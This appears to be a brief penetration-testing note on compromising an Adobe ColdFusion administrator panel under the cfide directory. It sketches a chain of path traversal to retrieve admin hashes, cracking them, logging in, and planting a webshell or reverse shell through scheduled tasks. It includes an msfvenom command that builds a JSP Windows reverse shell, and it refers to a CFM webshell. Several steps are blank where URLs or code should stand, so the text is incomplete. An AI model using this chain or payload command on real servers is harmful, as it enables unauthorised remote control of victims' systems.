Usually found under cfide dir

Path traversal vuln which allows to retrieve admin hashes :

After cracking the hashes , the user can login via


Then , in order to retrieve the dir browse to mappings section

Finally a webshell or revshell can be obtained via scheduled tasks section

JSP revshell via msf :

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=8888 -f jsp -o shell.jsp

CFM Webshell
